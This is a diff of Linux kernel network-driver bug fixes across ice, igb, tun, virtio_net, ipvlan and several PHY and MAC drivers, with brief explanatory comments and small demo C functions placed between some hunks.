+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1706,7 +1722,7 @@ ice_set_vf_port_vlan(struct net_device *netdev, int vf_id, u16 vlan_id, u8 qos,
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.c b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+index 1c51778db951b..71047fc341392 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+@@ -185,6 +185,25 @@ int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return 0;
+ }
+ 
++/**
++ * ice_check_vf_ready_for_reset - check if VF is ready to be reset
++ * @vf: VF to check if it's ready to be reset
++ *
++ * The purpose of this function is to ensure that the VF is not in reset,
++ * disabled, and is both initialized and active, thus enabling us to safely
++ * initialize another reset.
++ */
++int ice_check_vf_ready_for_reset(struct ice_vf *vf)
++{
++	int ret;
++
++	ret = ice_check_vf_ready_for_cfg(vf);
++	if (!ret && !test_bit(ICE_VF_STATE_ACTIVE, vf->vf_states))
++		ret = -EAGAIN;
++
++	return ret;
++}
++
+ /**
+  * ice_trigger_vf_reset - Reset a VF on HW
+  * @vf: pointer to the VF structure
+@@ -673,7 +692,7 @@ out_unlock:
+  * ice_set_vf_state_qs_dis - Set VF queues state to disabled
+  * @vf: pointer to the VF structure
+  */
+-void ice_set_vf_state_qs_dis(struct ice_vf *vf)
++static void ice_set_vf_state_qs_dis(struct ice_vf *vf)
+ {
+ 	/* Clear Rx/Tx enabled queues flag */
+ 	bitmap_zero(vf->txq_ena, ICE_MAX_RSS_QS_PER_VF);
+@@ -681,6 +700,16 @@ void ice_set_vf_state_qs_dis(struct ice_vf *vf)
+ 	clear_bit(ICE_VF_STATE_QS_ENA, vf->vf_states);
+ }
+ 
++/**
++ * ice_set_vf_state_dis - Set VF state to disabled
++ * @vf: pointer to the VF structure
++ */
++void ice_set_vf_state_dis(struct ice_vf *vf)
++{
++	ice_set_vf_state_qs_dis(vf);
++	vf->vf_ops->clear_reset_state(vf);
++}
++
+ /* Private functions only accessed from other virtualization files */
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.h b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+index 52bd9a3816bf2..e5bed85724622 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+@@ -56,6 +56,7 @@ struct ice_mdd_vf_events {
+ struct ice_vf_ops {
+ 	enum ice_disq_rst_src reset_type;
+ 	void (*free)(struct ice_vf *vf);
++	void (*clear_reset_state)(struct ice_vf *vf);
+ 	void (*clear_mbx_register)(struct ice_vf *vf);
+ 	void (*trigger_reset_register)(struct ice_vf *vf, bool is_vflr);
+ 	bool (*poll_reset_status)(struct ice_vf *vf);
+@@ -213,7 +214,8 @@ u16 ice_get_num_vfs(struct ice_pf *pf);
+ struct ice_vsi *ice_get_vf_vsi(struct ice_vf *vf);
+ bool ice_is_vf_disabled(struct ice_vf *vf);
+ int ice_check_vf_ready_for_cfg(struct ice_vf *vf);
+-void ice_set_vf_state_qs_dis(struct ice_vf *vf);
++int ice_check_vf_ready_for_reset(struct ice_vf *vf);
++void ice_set_vf_state_dis(struct ice_vf *vf);
+ bool ice_is_any_vf_in_unicast_promisc(struct ice_pf *pf);
+ void
+ ice_vf_get_promisc_masks(struct ice_vf *vf, struct ice_vsi *vsi,
+@@ -259,7 +261,7 @@ static inline int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline void ice_set_vf_state_qs_dis(struct ice_vf *vf)
++static inline void ice_set_vf_state_dis(struct ice_vf *vf)
+ {
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 2b4c791b6cbad..ef3c709d6a750 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -3722,6 +3722,7 @@ error_handler:
+ 		ice_vc_notify_vf_link_state(vf);
+ 		break;
+ 	case VIRTCHNL_OP_RESET_VF:
++		clear_bit(ICE_VF_STATE_ACTIVE, vf->vf_states);
+ 		ops->reset_vf(vf);
+ 		break;
+ 	case VIRTCHNL_OP_ADD_ETH_ADDR:
+diff --git a/drivers/net/ethernet/intel/igb/e1000_mac.c b/drivers/net/ethernet/intel/igb/e1000_mac.c
+index 205d577bdbbaa..caf91c6f52b4d 100644
+--- a/drivers/net/ethernet/intel/igb/e1000_mac.c
++++ b/drivers/net/ethernet/intel/igb/e1000_mac.c
+@@ -426,7 +426,7 @@ void igb_mta_set(struct e1000_hw *hw, u32 hash_value)
+ static u32 igb_hash_mc_addr(struct e1000_hw *hw, u8 *mc_addr)
+ {
+ 	u32 hash_value, hash_mask;
+-	u8 bit_shift = 0;
++	u8 bit_shift = 1;
+ 
+ 	/* Register count multiplied by bits per register */
+ 	hash_mask = (hw->mac.mta_reg_count * 32) - 1;
+@@ -434,7 +434,7 @@ static u32 igb_hash_mc_addr(struct e1000_hw *hw, u8 *mc_addr)
+ 	/* For a mc_filter_type of 0, bit_shift is the number of left-shifts
+ 	 * where 0xFF would still fall within the hash mask.
+ 	 */
+-	while (hash_mask >> bit_shift != 0xFF)
++	while (hash_mask >> bit_shift != 0xFF && bit_shift < 4)
+ 		bit_shift++;
+ 
+ 	/* The portion of the address that is used for the hash table
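
In igb_hash_mc_addr(), hash_mask is mta_reg_count * 32 - 1, an all-ones value, and the loop searches for the shift that reduces it to 0xFF. For masks shorter than 8 bits that value never appears, so the old unbounded loop starting at 0 could spin forever on a bogus register count; seeding bit_shift with 1 and capping it at 4 bounds the search for every real MTA size. A userspace check of the bounded search:

#include <stdio.h>

static unsigned int demo_bit_shift(unsigned int mta_reg_count)
{
	unsigned int hash_mask = mta_reg_count * 32 - 1;
	unsigned int bit_shift = 1;

	/* For the usual 128 registers the mask is 0xFFF and the loop stops
	 * at 4; for masks that never reduce to 0xFF the cap terminates it.
	 */
	while (hash_mask >> bit_shift != 0xFF && bit_shift < 4)
		bit_shift++;
	return bit_shift;
}

int main(void)
{
	printf("%u %u\n", demo_bit_shift(128), demo_bit_shift(32));	/* 4 2 */
	return 0;
}
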
+diff --git a/drivers/net/ethernet/mscc/vsc7514_regs.c b/drivers/net/ethernet/mscc/vsc7514_regs.c
+index 9d2d3e13cacfa..66c4284196143 100644
+--- a/drivers/net/ethernet/mscc/vsc7514_regs.c
++++ b/drivers/net/ethernet/mscc/vsc7514_regs.c
+@@ -252,15 +252,15 @@ const u32 vsc7514_sys_regmap[] = {
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_4,		0x000218),
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_5,		0x00021c),
+ 	REG(SYS_COUNT_DROP_YELLOW_PRIO_6,		0x000220),
+-	REG(SYS_COUNT_DROP_YELLOW_PRIO_7,		0x000214),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_0,		0x000218),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_1,		0x00021c),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_2,		0x000220),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_3,		0x000224),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_4,		0x000228),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_5,		0x00022c),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_6,		0x000230),
+-	REG(SYS_COUNT_DROP_GREEN_PRIO_7,		0x000234),
++	REG(SYS_COUNT_DROP_YELLOW_PRIO_7,		0x000224),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_0,		0x000228),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_1,		0x00022c),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_2,		0x000230),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_3,		0x000234),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_4,		0x000238),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_5,		0x00023c),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_6,		0x000240),
++	REG(SYS_COUNT_DROP_GREEN_PRIO_7,		0x000244),
+ 	REG(SYS_RESET_CFG,				0x000508),
+ 	REG(SYS_CMID,					0x00050c),
+ 	REG(SYS_VLAN_ETYPE_CFG,				0x000510),
+diff --git a/drivers/net/ethernet/pasemi/pasemi_mac.c b/drivers/net/ethernet/pasemi/pasemi_mac.c
+index aaab590ef548d..ed7dd0a042355 100644
+--- a/drivers/net/ethernet/pasemi/pasemi_mac.c
++++ b/drivers/net/ethernet/pasemi/pasemi_mac.c
+@@ -1423,7 +1423,7 @@ static void pasemi_mac_queue_csdesc(const struct sk_buff *skb,
+ 	write_dma_reg(PAS_DMA_TXCHAN_INCR(txring->chan.chno), 2);
+ }
+ 
+-static int pasemi_mac_start_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t pasemi_mac_start_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct pasemi_mac * const mac = netdev_priv(dev);
+ 	struct pasemi_mac_txring * const txring = tx_ring(mac);
+diff --git a/drivers/net/ethernet/sfc/ef100_netdev.c b/drivers/net/ethernet/sfc/ef100_netdev.c
+index ddcc325ed5701..c6b9ba6803c8d 100644
+--- a/drivers/net/ethernet/sfc/ef100_netdev.c
++++ b/drivers/net/ethernet/sfc/ef100_netdev.c
+@@ -372,7 +372,9 @@ int ef100_probe_netdev(struct efx_probe_data *probe_data)
+ 	efx->net_dev = net_dev;
+ 	SET_NETDEV_DEV(net_dev, &efx->pci_dev->dev);
+ 
+-	net_dev->features |= efx->type->offload_features;
++	/* enable all supported features except rx-fcs and rx-all */
++	net_dev->features |= efx->type->offload_features &
++			     ~(NETIF_F_RXFCS | NETIF_F_RXALL);
+ 	net_dev->hw_features |= efx->type->offload_features;
+ 	net_dev->hw_enc_features |= efx->type->offload_features;
+ 	net_dev->vlan_features |= NETIF_F_HW_CSUM | NETIF_F_SG |
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4.h b/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
+index 71dad409f78b0..12c0e60809f47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4.h
+@@ -181,6 +181,7 @@ enum power_event {
+ #define GMAC4_LPI_CTRL_STATUS	0xd0
+ #define GMAC4_LPI_TIMER_CTRL	0xd4
+ #define GMAC4_LPI_ENTRY_TIMER	0xd8
++#define GMAC4_MAC_ONEUS_TIC_COUNTER	0xdc
+ 
+ /* LPI control and status defines */
+ #define GMAC4_LPI_CTRL_STATUS_LPITCSE	BIT(21)	/* LPI Tx Clock Stop Enable */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 188a00065f66c..84276eb681d70 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -25,6 +25,7 @@ static void dwmac4_core_init(struct mac_device_info *hw,
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 	void __iomem *ioaddr = hw->pcsr;
+ 	u32 value = readl(ioaddr + GMAC_CONFIG);
++	u32 clk_rate;
+ 
+ 	value |= GMAC_CORE_INIT;
+ 
+@@ -47,6 +48,10 @@ static void dwmac4_core_init(struct mac_device_info *hw,
+ 
+ 	writel(value, ioaddr + GMAC_CONFIG);
+ 
++	/* Configure LPI 1us counter to number of CSR clock ticks in 1us - 1 */
++	clk_rate = clk_get_rate(priv->plat->stmmac_clk);
++	writel((clk_rate / 1000000) - 1, ioaddr + GMAC4_MAC_ONEUS_TIC_COUNTER);
++
+ 	/* Enable GMAC interrupts */
+ 	value = GMAC_INT_DEFAULT_ENABLE;
+ 
+diff --git a/drivers/net/ethernet/sun/cassini.c b/drivers/net/ethernet/sun/cassini.c
+index 0aca193d9550d..800956d5464b4 100644
+--- a/drivers/net/ethernet/sun/cassini.c
++++ b/drivers/net/ethernet/sun/cassini.c
+@@ -5095,6 +5095,8 @@ err_out_iounmap:
+ 		cas_shutdown(cp);
+ 	mutex_unlock(&cp->pm_mutex);
+ 
++	vfree(cp->fw_data);
++
+ 	pci_iounmap(pdev, cp->regs);
+ 
+ 
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index bb1c298c1e78b..2de3bd3b0c278 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -436,6 +436,9 @@ static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ 		goto err;
+ 	}
+ 	skb_dst_set(skb, &rt->dst);
++
++	memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++
+ 	err = ip_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		dev->stats.tx_errors++;
+@@ -474,6 +477,9 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 		goto err;
+ 	}
+ 	skb_dst_set(skb, dst);
++
++	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		dev->stats.tx_errors++;
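
Both ipvlan outbound paths now zero the skb control block before ip_local_out()/ip6_local_out(). skb->cb is scratch space owned by whichever layer currently holds the skb, so stale contents from earlier processing must not leak into the IP layer's IPCB/IP6CB view. The rule, reduced to a sketch (demo_xmit_v4 is a hypothetical wrapper, not an ipvlan function):

#include <net/ip.h>

static int demo_xmit_v4(struct net *net, struct sk_buff *skb)
{
	memset(IPCB(skb), 0, sizeof(*IPCB(skb)));	/* drop stale cb state */
	return ip_local_out(net, skb->sk, skb);
}
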
+diff --git a/drivers/net/mdio/mdio-mvusb.c b/drivers/net/mdio/mdio-mvusb.c
+index d5eabddfdf51b..11e048136ac23 100644
+--- a/drivers/net/mdio/mdio-mvusb.c
++++ b/drivers/net/mdio/mdio-mvusb.c
+@@ -73,6 +73,7 @@ static int mvusb_mdio_probe(struct usb_interface *interface,
+ 	struct device *dev = &interface->dev;
+ 	struct mvusb_mdio *mvusb;
+ 	struct mii_bus *mdio;
++	int ret;
+ 
+ 	mdio = devm_mdiobus_alloc_size(dev, sizeof(*mvusb));
+ 	if (!mdio)
+@@ -93,7 +94,15 @@ static int mvusb_mdio_probe(struct usb_interface *interface,
+ 	mdio->write = mvusb_mdio_write;
+ 
+ 	usb_set_intfdata(interface, mvusb);
+-	return of_mdiobus_register(mdio, dev->of_node);
++	ret = of_mdiobus_register(mdio, dev->of_node);
++	if (ret)
++		goto put_dev;
++
++	return 0;
++
++put_dev:
++	usb_put_dev(mvusb->udev);
++	return ret;
+ }
+ 
+ static void mvusb_mdio_disconnect(struct usb_interface *interface)
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index dd88624593c71..3f882bce37f42 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -881,7 +881,7 @@ int xpcs_do_config(struct dw_xpcs *xpcs, phy_interface_t interface,
+ 
+ 	switch (compat->an_mode) {
+ 	case DW_AN_C73:
+-		if (phylink_autoneg_inband(mode)) {
++		if (test_bit(ETHTOOL_LINK_MODE_Autoneg_BIT, advertising)) {
+ 			ret = xpcs_config_aneg_c73(xpcs, compat);
+ 			if (ret)
+ 				return ret;
+diff --git a/drivers/net/phy/bcm-phy-lib.h b/drivers/net/phy/bcm-phy-lib.h
+index 9902fb1820997..729db441797a0 100644
+--- a/drivers/net/phy/bcm-phy-lib.h
++++ b/drivers/net/phy/bcm-phy-lib.h
+@@ -40,6 +40,11 @@ static inline int bcm_phy_write_exp_sel(struct phy_device *phydev,
+ 	return bcm_phy_write_exp(phydev, reg | MII_BCM54XX_EXP_SEL_ER, val);
+ }
+ 
++static inline int bcm_phy_read_exp_sel(struct phy_device *phydev, u16 reg)
++{
++	return bcm_phy_read_exp(phydev, reg | MII_BCM54XX_EXP_SEL_ER);
++}
++
+ int bcm54xx_auxctl_write(struct phy_device *phydev, u16 regnum, u16 val);
+ int bcm54xx_auxctl_read(struct phy_device *phydev, u16 regnum);
+ 
+diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c
+index 75593e7d1118f..6cebf3aaa621f 100644
+--- a/drivers/net/phy/bcm7xxx.c
++++ b/drivers/net/phy/bcm7xxx.c
+@@ -487,7 +487,7 @@ static int bcm7xxx_16nm_ephy_afe_config(struct phy_device *phydev)
+ 	bcm_phy_write_misc(phydev, 0x0038, 0x0002, 0xede0);
+ 
+ 	/* Read CORE_EXPA9 */
+-	tmp = bcm_phy_read_exp(phydev, 0x00a9);
++	tmp = bcm_phy_read_exp_sel(phydev, 0x00a9);
+ 	/* CORE_EXPA9[6:1] is rcalcode[5:0] */
+ 	rcalcode = (tmp & 0x7e) / 2;
+ 	/* Correct RCAL code + 1 is -1% rprogr, LP: +16 */
+diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c
+index 7446d5c6c7146..14990f8462ae3 100644
+--- a/drivers/net/phy/dp83867.c
++++ b/drivers/net/phy/dp83867.c
+@@ -42,6 +42,7 @@
+ #define DP83867_STRAP_STS1	0x006E
+ #define DP83867_STRAP_STS2	0x006f
+ #define DP83867_RGMIIDCTL	0x0086
++#define DP83867_DSP_FFE_CFG	0x012c
+ #define DP83867_RXFCFG		0x0134
+ #define DP83867_RXFPMD1	0x0136
+ #define DP83867_RXFPMD2	0x0137
+@@ -910,8 +911,27 @@ static int dp83867_phy_reset(struct phy_device *phydev)
+ 
+ 	usleep_range(10, 20);
+ 
+-	return phy_modify(phydev, MII_DP83867_PHYCTRL,
++	err = phy_modify(phydev, MII_DP83867_PHYCTRL,
+ 			 DP83867_PHYCR_FORCE_LINK_GOOD, 0);
++	if (err < 0)
++		return err;
++
++	/* Configure the DSP Feedforward Equalizer Configuration register to
++	 * improve short cable (< 1 meter) performance. This will not affect
++	 * long cable performance.
++	 */
++	err = phy_write_mmd(phydev, DP83867_DEVADDR, DP83867_DSP_FFE_CFG,
++			    0x0e81);
++	if (err < 0)
++		return err;
++
++	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESTART);
++	if (err < 0)
++		return err;
++
++	usleep_range(10, 20);
++
++	return 0;
+ }
+ 
+ static void dp83867_link_change_notify(struct phy_device *phydev)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 760d8d1b6cba4..3c468ef8f245f 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -739,7 +739,7 @@ static ssize_t tap_get_user(struct tap_queue *q, void *msg_control,
+ 
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0)
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
+ 		skb_set_network_header(skb, depth);
+ 
+ 	/* copy skb_ubuf_info for callback when skb has no error */
+@@ -1180,7 +1180,7 @@ static int tap_get_user_xdp(struct tap_queue *q, struct xdp_buff *xdp)
+ 
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0)
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
+ 		skb_set_network_header(skb, depth);
+ 
+ 	rcu_read_lock();
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 91d198aff2f9a..7c8db8f6f661e 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1748,7 +1748,7 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 	u32 rxhash = 0;
+ 	int skb_xdp = 1;
+ 	bool frags = tun_napi_frags_enabled(tfile);
+-	enum skb_drop_reason drop_reason;
++	enum skb_drop_reason drop_reason = SKB_DROP_REASON_NOT_SPECIFIED;
+ 
+ 	if (!(tun->flags & IFF_NO_PI)) {
+ 		if (len < sizeof(pi))
+@@ -1809,10 +1809,9 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 		 * skb was created with generic XDP routine.
+ 		 */
+ 		skb = tun_build_skb(tun, tfile, from, &gso, len, &skb_xdp);
+-		if (IS_ERR(skb)) {
+-			dev_core_stats_rx_dropped_inc(tun->dev);
+-			return PTR_ERR(skb);
+-		}
++		err = PTR_ERR_OR_ZERO(skb);
++		if (err)
++			goto drop;
+ 		if (!skb)
+ 			return total_len;
+ 	} else {
+@@ -1837,13 +1836,9 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 					    noblock);
+ 		}
+ 
+-		if (IS_ERR(skb)) {
+-			if (PTR_ERR(skb) != -EAGAIN)
+-				dev_core_stats_rx_dropped_inc(tun->dev);
+-			if (frags)
+-				mutex_unlock(&tfile->napi_mutex);
+-			return PTR_ERR(skb);
+-		}
++		err = PTR_ERR_OR_ZERO(skb);
++		if (err)
++			goto drop;
+ 
+ 		if (zerocopy)
+ 			err = zerocopy_sg_from_iter(skb, from);
+@@ -1853,27 +1848,14 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 		if (err) {
+ 			err = -EFAULT;
+ 			drop_reason = SKB_DROP_REASON_SKB_UCOPY_FAULT;
+-drop:
+-			dev_core_stats_rx_dropped_inc(tun->dev);
+-			kfree_skb_reason(skb, drop_reason);
+-			if (frags) {
+-				tfile->napi.skb = NULL;
+-				mutex_unlock(&tfile->napi_mutex);
+-			}
+-
+-			return err;
++			goto drop;
+ 		}
+ 	}
+ 
+ 	if (virtio_net_hdr_to_skb(skb, &gso, tun_is_little_endian(tun))) {
+ 		atomic_long_inc(&tun->rx_frame_errors);
+-		kfree_skb(skb);
+-		if (frags) {
+-			tfile->napi.skb = NULL;
+-			mutex_unlock(&tfile->napi_mutex);
+-		}
+-
+-		return -EINVAL;
++		err = -EINVAL;
++		goto free_skb;
+ 	}
+ 
+ 	switch (tun->flags & TUN_TYPE_MASK) {
+@@ -1889,9 +1871,8 @@ drop:
+ 				pi.proto = htons(ETH_P_IPV6);
+ 				break;
+ 			default:
+-				dev_core_stats_rx_dropped_inc(tun->dev);
+-				kfree_skb(skb);
+-				return -EINVAL;
++				err = -EINVAL;
++				goto drop;
+ 			}
+ 		}
+ 
+@@ -1933,11 +1914,7 @@ drop:
+ 			if (ret != XDP_PASS) {
+ 				rcu_read_unlock();
+ 				local_bh_enable();
+-				if (frags) {
+-					tfile->napi.skb = NULL;
+-					mutex_unlock(&tfile->napi_mutex);
+-				}
+-				return total_len;
++				goto unlock_frags;
+ 			}
+ 		}
+ 		rcu_read_unlock();
+@@ -1994,6 +1971,14 @@ napi_busy:
+ 		int queue_len;
+ 
+ 		spin_lock_bh(&queue->lock);
++
++		if (unlikely(tfile->detached)) {
++			spin_unlock_bh(&queue->lock);
++			rcu_read_unlock();
++			err = -EBUSY;
++			goto free_skb;
++		}
++
+ 		__skb_queue_tail(queue, skb);
+ 		queue_len = skb_queue_len(queue);
+ 		spin_unlock(&queue->lock);
+@@ -2017,6 +2002,22 @@ napi_busy:
+ 		tun_flow_update(tun, rxhash, tfile);
+ 
+ 	return total_len;
++
++drop:
++	if (err != -EAGAIN)
++		dev_core_stats_rx_dropped_inc(tun->dev);
++
++free_skb:
++	if (!IS_ERR_OR_NULL(skb))
++		kfree_skb_reason(skb, drop_reason);
++
++unlock_frags:
++	if (frags) {
++		tfile->napi.skb = NULL;
++		mutex_unlock(&tfile->napi_mutex);
++	}
++
++	return err ?: total_len;
+ }
+ 
+ static ssize_t tun_chr_write_iter(struct kiocb *iocb, struct iov_iter *from)
+@@ -2513,6 +2514,13 @@ build:
+ 	if (tfile->napi_enabled) {
+ 		queue = &tfile->sk.sk_write_queue;
+ 		spin_lock(&queue->lock);
++
++		if (unlikely(tfile->detached)) {
++			spin_unlock(&queue->lock);
++			kfree_skb(skb);
++			return -EBUSY;
++		}
++
+ 		__skb_queue_tail(queue, skb);
+ 		spin_unlock(&queue->lock);
+ 		ret = 1;
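
The tun_get_user() rework above collapses several open-coded exits into one cascading ladder (drop -> free_skb -> unlock_frags), so the rx-dropped statistic, the skb free, and the napi_mutex unlock each live in exactly one place, and "err ?: total_len" lets a consumed-elsewhere path reuse the same tail as its success return. The shape of such a ladder, with hypothetical demo_* types and helpers:

#include <linux/mutex.h>
#include <linux/skbuff.h>

struct demo_ctx { bool frags; struct mutex napi_mutex; };

struct sk_buff *demo_build_skb(struct demo_ctx *ctx);		/* hypothetical */
bool demo_xdp_consumed(struct demo_ctx *ctx, struct sk_buff *skb);
bool demo_queue_full(struct demo_ctx *ctx);
void demo_queue(struct demo_ctx *ctx, struct sk_buff *skb);
void demo_count_rx_dropped(struct demo_ctx *ctx);

static ssize_t demo_get_user(struct demo_ctx *ctx, ssize_t total_len)
{
	struct sk_buff *skb;
	int err;

	skb = demo_build_skb(ctx);		/* may return ERR_PTR() */
	err = PTR_ERR_OR_ZERO(skb);
	if (err)
		goto drop;

	if (demo_xdp_consumed(ctx, skb)) {	/* buffer owned by XDP now */
		err = 0;
		goto unlock_frags;		/* returns total_len below */
	}

	if (demo_queue_full(ctx)) {
		err = -EBUSY;
		goto free_skb;			/* free, but not a "drop" stat */
	}

	demo_queue(ctx, skb);
	return total_len;

drop:
	if (err != -EAGAIN)
		demo_count_rx_dropped(ctx);
free_skb:
	if (!IS_ERR_OR_NULL(skb))		/* skb may hold ERR_PTR(err) */
		kfree_skb(skb);
unlock_frags:
	if (ctx->frags)				/* mutex held only in frag mode */
		mutex_unlock(&ctx->napi_mutex);
	return err ?: total_len;
}
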
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 9a612b13b4e46..47788f0935514 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1697,6 +1697,38 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 	return received;
+ }
+ 
++static void virtnet_disable_queue_pair(struct virtnet_info *vi, int qp_index)
++{
++	virtnet_napi_tx_disable(&vi->sq[qp_index].napi);
++	napi_disable(&vi->rq[qp_index].napi);
++	xdp_rxq_info_unreg(&vi->rq[qp_index].xdp_rxq);
++}
++
++static int virtnet_enable_queue_pair(struct virtnet_info *vi, int qp_index)
++{
++	struct net_device *dev = vi->dev;
++	int err;
++
++	err = xdp_rxq_info_reg(&vi->rq[qp_index].xdp_rxq, dev, qp_index,
++			       vi->rq[qp_index].napi.napi_id);
++	if (err < 0)
++		return err;
++
++	err = xdp_rxq_info_reg_mem_model(&vi->rq[qp_index].xdp_rxq,
++					 MEM_TYPE_PAGE_SHARED, NULL);
++	if (err < 0)
++		goto err_xdp_reg_mem_model;
++
++	virtnet_napi_enable(vi->rq[qp_index].vq, &vi->rq[qp_index].napi);
++	virtnet_napi_tx_enable(vi, vi->sq[qp_index].vq, &vi->sq[qp_index].napi);
++
++	return 0;
++
++err_xdp_reg_mem_model:
++	xdp_rxq_info_unreg(&vi->rq[qp_index].xdp_rxq);
++	return err;
++}
++
+ static int virtnet_open(struct net_device *dev)
+ {
+ 	struct virtnet_info *vi = netdev_priv(dev);
+@@ -1710,22 +1742,20 @@ static int virtnet_open(struct net_device *dev)
+ 			if (!try_fill_recv(vi, &vi->rq[i], GFP_KERNEL))
+ 				schedule_delayed_work(&vi->refill, 0);
+ 
+-		err = xdp_rxq_info_reg(&vi->rq[i].xdp_rxq, dev, i, vi->rq[i].napi.napi_id);
++		err = virtnet_enable_queue_pair(vi, i);
+ 		if (err < 0)
+-			return err;
+-
+-		err = xdp_rxq_info_reg_mem_model(&vi->rq[i].xdp_rxq,
+-						 MEM_TYPE_PAGE_SHARED, NULL);
+-		if (err < 0) {
+-			xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+-			return err;
+-		}
+-
+-		virtnet_napi_enable(vi->rq[i].vq, &vi->rq[i].napi);
+-		virtnet_napi_tx_enable(vi, vi->sq[i].vq, &vi->sq[i].napi);
++			goto err_enable_qp;
+ 	}
+ 
+ 	return 0;
++
++err_enable_qp:
++	disable_delayed_refill(vi);
++	cancel_delayed_work_sync(&vi->refill);
++
++	for (i--; i >= 0; i--)
++		virtnet_disable_queue_pair(vi, i);
++	return err;
+ }
+ 
+ static int virtnet_poll_tx(struct napi_struct *napi, int budget)
+@@ -2157,11 +2187,8 @@ static int virtnet_close(struct net_device *dev)
+ 	/* Make sure refill_work doesn't re-enable napi! */
+ 	cancel_delayed_work_sync(&vi->refill);
+ 
+-	for (i = 0; i < vi->max_queue_pairs; i++) {
+-		napi_disable(&vi->rq[i].napi);
+-		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+-		virtnet_napi_tx_disable(&vi->sq[i].napi);
+-	}
++	for (i = 0; i < vi->max_queue_pairs; i++)
++		virtnet_disable_queue_pair(vi, i);
+ 
+ 	return 0;
+ }
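
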